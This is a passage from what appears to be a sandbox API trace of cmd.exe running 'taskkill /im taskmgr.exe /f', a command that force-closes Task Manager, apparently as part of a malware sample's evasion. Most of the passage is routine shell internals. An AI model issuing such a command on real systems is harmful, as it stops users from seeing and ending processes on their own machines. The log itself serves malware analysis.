lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0248.146] RegCloseKey (hKey=0x94) returned 0x0 [0248.146] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7514 [0248.146] srand (_Seed=0x620b7514) [0248.146] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C taskkill /im taskmgr.exe /f" [0248.146] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C taskkill /im taskmgr.exe /f" [0248.146] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0248.147] GetProcessHeap () returned 0x7a0000 [0248.147] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x210) returned 0x7a9b70 [0248.147] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7a9b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0248.147] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0248.147] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0248.147] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0248.147] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0248.147] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0248.147] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0248.147] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0248.147] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0248.147] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0248.147] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0248.147] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0248.148] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0248.148] GetProcessHeap () returned 0x7a0000 [0248.148] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7a8720) returned 1 [0248.148] GetEnvironmentStringsW () returned 0x7a7cf8* [0248.149] GetProcessHeap () returned 0x7a0000 [0248.149] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa32) returned 0x7aa7c8 [0248.150] FreeEnvironmentStringsA (penv="A") returned 1 [0248.150] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0248.150] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0248.150] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0248.150] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0248.150] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0248.150] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0248.151] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0248.151] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0248.151] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0248.151] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0248.151] GetProcessHeap () returned 0x7a0000 [0248.151] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x44) returned 0x7a05c8 [0248.151] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0248.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0248.151] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0248.151] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7a0618 [0248.152] FindClose (in: hFindFile=0x7a0618 | out: hFindFile=0x7a0618) returned 1 [0248.152] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x7a0618 [0248.152] FindClose (in: hFindFile=0x7a0618 | out: hFindFile=0x7a0618) returned 1 [0248.152] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0248.152] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7a0618 [0248.153] FindClose (in: hFindFile=0x7a0618 | out: hFindFile=0x7a0618) returned 1 [0248.153] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0248.153] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0248.153] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0248.153] GetProcessHeap () returned 0x7a0000 [0248.154] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7aa7c8) returned 1 [0248.154] GetEnvironmentStringsW () returned 0x7a7cf8* [0248.154] GetProcessHeap () returned 0x7a0000 [0248.154] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa76) returned 0x7a9d88 [0248.154] FreeEnvironmentStringsA (penv="=") returned 1 [0248.154] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0248.154] GetProcessHeap () returned 0x7a0000 [0248.154] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7a05c8) returned 1 [0248.155] GetProcessHeap () returned 0x7a0000 [0248.155] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x400e) returned 0x7abc88 [0248.155] GetProcessHeap () returned 0x7a0000 [0248.155] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x44) returned 0x7aa808 [0248.155] GetProcessHeap () returned 0x7a0000 [0248.156] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7abc88) returned 1 [0248.156] GetConsoleOutputCP () returned 0x1b5 [0248.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0248.156] GetUserDefaultLCID () returned 0x409 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0248.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0248.158] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0248.158] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0248.158] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0248.158] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0248.160] GetProcessHeap () returned 0x7a0000 [0248.160] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x0, Size=0x20c) returned 0x7aa8a0 [0248.160] GetConsoleTitleW (in: lpConsoleTitle=0x7aa8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0248.160] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0248.160] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0248.160] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0248.160] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0248.162] GetProcessHeap () returned 0x7a0000 [0248.162] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x400a) returned 0x7abc88 [0248.162] GetProcessHeap () returned 0x7a0000 [0248.162] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7abc88) returned 1 [0248.163] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0248.163] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0248.163] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0248.163] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0248.164] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0248.164] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0248.164] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0248.164] GetProcessHeap () returned 0x7a0000 [0248.164] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x58) returned 0x7aaab8 [0248.164] GetProcessHeap () returned 0x7a0000 [0248.164] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x1a) returned 0x7a0578 [0248.164] GetProcessHeap () returned 0x7a0000 [0248.164] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x30) returned 0x7aab18 [0248.165] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0248.166] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0248.166] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0248.166] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0248.166] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0248.166] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0248.166] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0248.166] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0248.166] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0248.166] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0248.166] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0248.166] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0248.166] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0248.166] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0248.166] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0248.166] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0248.166] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0248.166] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0248.166] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0248.166] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0248.166] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0248.166] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0248.166] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0248.166] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0248.166] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0248.166] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0248.166] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0248.167] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0248.167] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0248.167] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0248.167] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0248.167] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0248.167] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0248.167] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0248.167] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0248.167] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0248.167] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0248.167] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0248.167] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0248.167] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0248.167] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0248.167] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0248.167] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0248.167] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0248.167] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0248.167] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0248.167] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0248.167] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0248.167] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0248.167] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0248.167] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0248.167] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0248.167] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0248.167] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0248.167] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0248.167] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0248.167] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0248.167] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0248.168] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0248.168] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0248.168] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0248.168] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0248.168] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0248.168] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0248.168] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0248.168] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0248.168] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0248.168] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0248.168] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0248.168] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0248.168] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0248.168] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0248.168] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0248.168] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0248.168] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0248.168] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0248.168] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0248.168] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0248.168] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0248.168] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0248.168] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0248.168] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0248.168] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0248.168] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0248.168] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0248.168] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0248.168] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0248.168] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0248.169] GetProcessHeap () returned 0x7a0000 [0248.169] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x210) returned 0x7aab50 [0248.169] GetProcessHeap () returned 0x7a0000 [0248.169] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x42) returned 0x7aad68 [0248.169] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0248.169] GetProcessHeap () returned 0x7a0000 [0248.169] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x418) returned 0x7aadb8 [0248.170] SetErrorMode (uMode=0x0) returned 0x0 [0248.170] SetErrorMode (uMode=0x1) returned 0x0 [0248.170] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7aadc0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0248.170] SetErrorMode (uMode=0x0) returned 0x1 [0248.170] GetProcessHeap () returned 0x7a0000 [0248.170] RtlReAllocateHeap (Heap=0x7a0000, Flags=0x0, Ptr=0x7aadb8, Size=0x56) returned 0x7aadb8 [0248.170] GetProcessHeap () returned 0x7a0000 [0248.170] RtlSizeHeap (HeapHandle=0x7a0000, Flags=0x0, MemoryPointer=0x7aadb8) returned 0x56 [0248.170] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0248.170] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0248.170] GetProcessHeap () returned 0x7a0000 [0248.170] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x110) returned 0x7aae18 [0248.170] GetProcessHeap () returned 0x7a0000 [0248.170] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x218) returned 0x7aaf30 [0248.178] GetProcessHeap () returned 0x7a0000 [0248.178] RtlReAllocateHeap (Heap=0x7a0000, Flags=0x0, Ptr=0x7aaf30, Size=0x112) returned 0x7aaf30 [0248.178] GetProcessHeap () returned 0x7a0000 [0248.178] RtlSizeHeap (HeapHandle=0x7a0000, Flags=0x0, MemoryPointer=0x7aaf30) returned 0x112 [0248.178] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0248.178] GetProcessHeap () returned 0x7a0000 [0248.178] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xe0) returned 0x7ab050 [0248.180] GetProcessHeap () returned 0x7a0000 [0248.180] RtlReAllocateHeap (Heap=0x7a0000, Flags=0x0, Ptr=0x7ab050, Size=0x76) returned 0x7ab050 [0248.180] GetProcessHeap () returned 0x7a0000 [0248.180] RtlSizeHeap (HeapHandle=0x7a0000, Flags=0x0, MemoryPointer=0x7ab050) returned 0x76 [0248.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.181] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0248.182] GetLastError () returned 0x2 [0248.182] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x7ab0d0 [0248.182] GetProcessHeap () returned 0x7a0000 [0248.182] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x0, Size=0x14) returned 0x7a7520 [0248.182] FindClose (in: hFindFile=0x7ab0d0 | out: hFindFile=0x7ab0d0) returned 1 [0248.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0248.182] GetLastError () returned 0x2 [0248.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x7ab0d0 [0248.183] GetProcessHeap () returned 0x7a0000 [0248.183] RtlReAllocateHeap (Heap=0x7a0000, Flags=0x0, Ptr=0x7a7520, Size=0x4) returned 0x7ab110 [0248.183] FindClose (in: hFindFile=0x7ab0d0 | out: hFindFile=0x7ab0d0) returned 1 [0248.183] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0248.183] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0248.183] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0248.183] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0248.183] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0248.183] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0248.184] GetProcessHeap () returned 0x7a0000 [0248.184] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x18) returned 0x7a7740 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.184] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 